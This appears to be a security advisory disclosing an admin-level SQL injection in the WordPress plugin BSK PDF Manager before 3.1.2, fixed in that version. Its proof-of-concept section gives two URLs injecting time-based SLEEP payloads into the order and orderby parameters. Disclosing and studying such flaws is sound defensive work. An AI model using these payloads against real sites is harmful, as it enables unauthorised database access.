WordPress Plugin Vulnerabilities

BSK PDF Manager < 3.1.2 - Admin+ SQL Injection

Description

The plugin does not validate and escape the orderby and order parameters before using them in a SQL statement, leading to a SQL injection issue

Proof of Concept

With at least one BSK PDF Category:

https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&order=and+sleep(5)
https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&orderby=last_date`+AND+SLEEP(5)+OR+`last_date

Affects Plugins

Fixed in 3.1.2

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
Verified
Yes

Timeline

Publicly Published
2021-11-01 (about 2 years ago)
Added
2021-11-01 (about 2 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other